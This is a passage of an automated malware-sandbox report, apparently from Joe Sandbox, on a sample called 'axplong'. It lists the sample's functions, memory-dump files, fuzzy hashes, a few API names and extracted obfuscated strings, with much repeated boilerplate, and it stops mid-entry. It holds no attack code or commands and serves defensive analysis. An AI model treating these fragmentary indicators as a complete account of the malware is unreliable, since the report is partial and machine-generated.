Instruction Fuzzy Hash: 29F0E9EB04C550EF6086D1E15B596FE6F5EE2E373023485ABF447D298291840E895332

Function 053C0377 Relevance: .0, Instructions: 45COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3000705965.00000000053C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_53c0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 615f382e9cf111c7ee0b2362e99324e672acb9868ffe891e86756db29b254017
Instruction ID: 610801d3c580c4c33adb3ee31b2bcb8fbff19e53b0481e66cb85ac33af396b6d
Opcode Fuzzy Hash: 615f382e9cf111c7ee0b2362e99324e672acb9868ffe891e86756db29b254017
Instruction Fuzzy Hash: A6F0ECAB19D5A0DF644AD1E1174D7FE5F5FB0D353037441ABF00784D82D1844E5D5761

Function 053C0325 Relevance: .0, Instructions: 40COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3000705965.00000000053C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_53c0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 81cd69628992834884e3ac5c92cc39ad17e720fa6e18fbaa3c57e6c18bbc57dc
Instruction ID: 3856c5ceaf869aa10a9255bb3969612421494a7e31bde72e3b9d3d1837d82c23
Opcode Fuzzy Hash: 81cd69628992834884e3ac5c92cc39ad17e720fa6e18fbaa3c57e6c18bbc57dc
Instruction Fuzzy Hash: C2F082E715CA90DF9192C2D15A9D6FA7FBAB6D323033441EFE48296482D2540E299B32

Function 053C0349 Relevance: .0, Instructions: 37COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3000705965.00000000053C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_53c0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 64353d8081d87acb9983daec6cea71c82912f60cd0992beefcbc27d525303272
Instruction ID: d7344ab3c42206f1d8b6d44463787e4cea87b51fcf82774a3f1ecde0952c40b0
Opcode Fuzzy Hash: 64353d8081d87acb9983daec6cea71c82912f60cd0992beefcbc27d525303272
Instruction Fuzzy Hash: EEE09AA714C550EEA195D2E2274C6BDAB6DB0D723133481BBE45286982E2850F5E6332

Function 053C0365 Relevance: .0, Instructions: 27COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3000705965.00000000053C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_53c0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 712262acad8c8dc31e7e719c5d5da1f9db2606c28a2541b8420ac75264b0d0e1
Instruction ID: 6a337ca2fefe93a7a62aaf810920c44b4cc5480bac6a24f0542418493508bf8f
Opcode Fuzzy Hash: 712262acad8c8dc31e7e719c5d5da1f9db2606c28a2541b8420ac75264b0d0e1
Instruction Fuzzy Hash: 5BD05EAB08C520EE7085D2D12A0DAFEAA7DF0D327133080BBF842D0482E5844E2E6232

Non-executed Functions

Function 00B2E440 Relevance: 14.8, Strings: 11, Instructions: 1000COMMON

Download Yara Rule

Strings

#, xrefs: 00B30534
MJB+, xrefs: 00B2E734
246122658369, xrefs: 00B2F647, 00B2F924, 00B304F7, 00B308AA
WGt=, xrefs: 00B2F62D, 00B2F90A
WWt=, xrefs: 00B3088D
111, xrefs: 00B2F6B0
GqKudSO2, xrefs: 00B2E47F
UD==, xrefs: 00B2EA1F, 00B2EC66
WWp=, xrefs: 00B304DA
MT==, xrefs: 00B2E4A5
fed3aa, xrefs: 00B2FA9E

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: #$111$246122658369$GqKudSO2$MJB+$MT==$UD==$WGt=$WWp=$WWt=$fed3aa
API String ID: 0-214772295
Opcode ID: a39596d8c4a11a9bba8ce2af06887075944dd25c4d21607e9f7482a50fbd3f5a
Instruction ID: ca795e50d8af56782cbe04b9e7f16ed82521dfa6ca899be18feed818fe93e6b0
Opcode Fuzzy Hash: a39596d8c4a11a9bba8ce2af06887075944dd25c4d21607e9f7482a50fbd3f5a
Instruction Fuzzy Hash: E882C27090428CDBEF14EF68C9497DD7BF6AB45304F6081D8E8196B3C2D7759A88CB92

Function 00B63068 Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1340COMMON

Download Yara Rule

APIs

__floor_pentium4.LIBCMT ref: 00B631E3

Strings

1#IND, xrefs: 00B64373
1#QNAN, xrefs: 00B64381
1#SNAN, xrefs: 00B6437A
1#INF, xrefs: 00B6439E

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID: __floor_pentium4
String ID: 1#IND$1#INF$1#QNAN$1#SNAN
API String ID: 4168288129-2761157908
Opcode ID: 1248628a4b6957dbc2084dced524b088f8c1bb55e5ab34b62d4ef75849926145
Instruction ID: 35111f8b52fb9a129fd6bb9652acb25b367408d6462aa49d63477bcf2e62ea92
Opcode Fuzzy Hash: 1248628a4b6957dbc2084dced524b088f8c1bb55e5ab34b62d4ef75849926145
Instruction Fuzzy Hash: CEC22B71E086288FDB25CE28DD807E9B7F5EB48715F1441EAD84EE7240E779AE858F40

Function 00B62BD0 Relevance: 3.4, APIs: 2, Instructions: 450COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction ID: dbd6b00f5f5b192a60ba1836f50b7759ae890db92512a6aa31b3d0027df580e2
Opcode Fuzzy Hash: 5bf072589c0c8c6daaa14a71d751704f1d0fc013c2abe94fbb674223392015af
Instruction Fuzzy Hash: 56F15F71E016199FDF14CFA8C9806AEB7F1FF88314F1582A9E819AB344D735AE45CB90

Function 00B3CB1A Relevance: 1.5, APIs: 1, Instructions: 16timeCOMMONLIBRARYCODE

Download Yara Rule

APIs

GetSystemTimePreciseAsFileTime.KERNEL32(?,00B3CE82,?,?,?,?,00B3CEB7,?,?,?,?,?,?,00B3C42D,?,00000001), ref: 00B3CB33

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID: Time$FilePreciseSystem
String ID:
API String ID: 1802150274-0
Opcode ID: bba06858317cd5d95a56b9b1fc6f64ace4ae8e43cb20c0c3118f31a37f0df6d5
Instruction ID: 69e209e1300413416cd9151e19bef7b943c7243b0416aac41fd061e4729aa73f
Opcode Fuzzy Hash: bba06858317cd5d95a56b9b1fc6f64ace4ae8e43cb20c0c3118f31a37f0df6d5
Instruction Fuzzy Hash: ADD0223261203C93CA113BD4AC098AEFF488A00B50B100252EC09371209E516C409BE0

Function 00B57D83 Relevance: 1.5, Strings: 1, Instructions: 216COMMON

Download Yara Rule

Strings

0, xrefs: 00B57EFF

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID: 0
API String ID: 0-4108050209
Opcode ID: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction ID: 35e34e3208cf3bae528df5ab514ebea44b0e82e95075da816b65d2783e80ed30
Opcode Fuzzy Hash: 34b90d6f816b0148f172a566a29f4731fc4dbb34a2dc1360e8ce98d5d1eead5a
Instruction Fuzzy Hash: 7B5146B03CC78856EB389A28A8DABBE67EEDF15303F1404E9DC42D76C1DE519D4D8251

Function 00B24CF0 Relevance: .7, Instructions: 701COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2623d94f59246d4774031962193a2b884fb5184f9a39c11e22059c22a88efcb9
Instruction ID: 372e7ad6bdf62eae66db4f7ab292de9d91807b19e60130f8501e28bf970d67ed
Opcode Fuzzy Hash: 2623d94f59246d4774031962193a2b884fb5184f9a39c11e22059c22a88efcb9
Instruction Fuzzy Hash: 4A225FB7F515144BDB0CCA9DDCA27EDB2E3AFD8214B0E803DA40AE3345EA79D9158A44

Function 00B66F09 Relevance: .3, Instructions: 275COMMONLIBRARYCODE

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: fc406082115fe2dda0aab0a1b8b9370fb1c09c4b91c68a0703525a0a21bb1496
Instruction ID: 24675286f6e79ab9fd7c2a983e5e31a5095c03983b2cc9d51d62b65eedd75873
Opcode Fuzzy Hash: fc406082115fe2dda0aab0a1b8b9370fb1c09c4b91c68a0703525a0a21bb1496
Instruction Fuzzy Hash: C6B16D31214609DFD719CF28C486B657BE0FF45368F258699E8D9CF2A1C73AE982CB40

Function 00B3D312 Relevance: .2, Instructions: 172COMMON

Download Yara Rule

APIs

___std_exception_copy.LIBVCRUNTIME ref: 00B2247E

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID: ___std_exception_copy
String ID:
API String ID: 2659868963-0
Opcode ID: b2ecee2f4f00ec10a392faec3dc5ccd478879a19b77bcc1c32b62a18acc419db
Instruction ID: 8ab57d6fa5a4daa4a951767c1d7338624c367e451d4238ba7fc4e458696bfc60
Opcode Fuzzy Hash: b2ecee2f4f00ec10a392faec3dc5ccd478879a19b77bcc1c32b62a18acc419db
Instruction Fuzzy Hash: F05191B1A006068FDB29CF69E8C57ADBBF4FB08310F3485AAD415EB264DB74A940CF50

Function 00B24AF0 Relevance: .2, Instructions: 158COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5891eccb92e9395a48b06c4bfee9599e346a19288033bd7b2fb97243676cc14f
Instruction ID: 9b23a0b5d97c0ff04e1e95b543b1fbfed2b80e12d52fbed11735422d7659f2cb
Opcode Fuzzy Hash: 5891eccb92e9395a48b06c4bfee9599e346a19288033bd7b2fb97243676cc14f
Instruction Fuzzy Hash: D051C27060C3918FD319CF2D911523ABFE1EF95200F084A9EE4DA8B292D774DA44CB92

Function 00B6777B Relevance: .1, Instructions: 104COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 703db768b7bd22b7b0511ac0e691e4bb5f09083d4e5c6b3891427b034f51a4c9
Instruction ID: 7bfe9796f1c85745d62ef3bce101dcf01df9e1896604d23a5f038f3350618b3e
Opcode Fuzzy Hash: 703db768b7bd22b7b0511ac0e691e4bb5f09083d4e5c6b3891427b034f51a4c9
Instruction Fuzzy Hash: 9E21B673F204394B770CC47E8C572BDB6E1C68C541745423AE8A6EA2C1D968D917E2E4

Function 053C0B79 Relevance: .1, Instructions: 91COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.3000705965.00000000053C0000.00000040.00001000.00020000.00000000.sdmp, Offset: 053C0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_53c0000_axplong.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 87c412c7ee52fb327b63893545ce1294dc4ff74bd81c7b4c33d1aa4ad94f994a
Instruction ID: 4586dfb54a5ae511664b759c02b08bde7b7d497ec62ab304ba3b37d369f5cabd
Opcode Fuzzy Hash: 87c412c7ee52fb327b63893545ce1294dc4ff74bd81c7b4c33d1aa4ad94f994a
Instruction Fuzzy Hash: C21108B625D3D5EEA20AD561565CCFE7F2EE58333433084FEE442C9903D2958D098371

Function 00B6765B Relevance: .1, Instructions: 81COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000006.00000002.2994463490.0000000000B21000.00000040.00000001.01000000.00000007.sdmp, Offset: 00B20000, based on PE: true

Associated: 00000006.00000002.2994440344.0000000000B20000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994463490.0000000000B82000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994553077.0000000000B89000.00000004.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000B8B000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000D1D000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E04000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E30000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E39000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2994581739.0000000000E47000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995581182.0000000000E48000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995740021.0000000000FF0000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995769866.0000000000FF1000.00000080.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995801524.0000000000FF2000.00000040.00000001.01000000.00000007.sdmpDownload File
Associated: 00000006.00000002.2995833737.0000000000FF3000.00000080.00000001.01000000.00000007.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_b20000_axplong.jbxd

Yara matches

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 5292823e0901e2095568c644c3a13ac4312a4747ba2afa673666e88afcdacb82
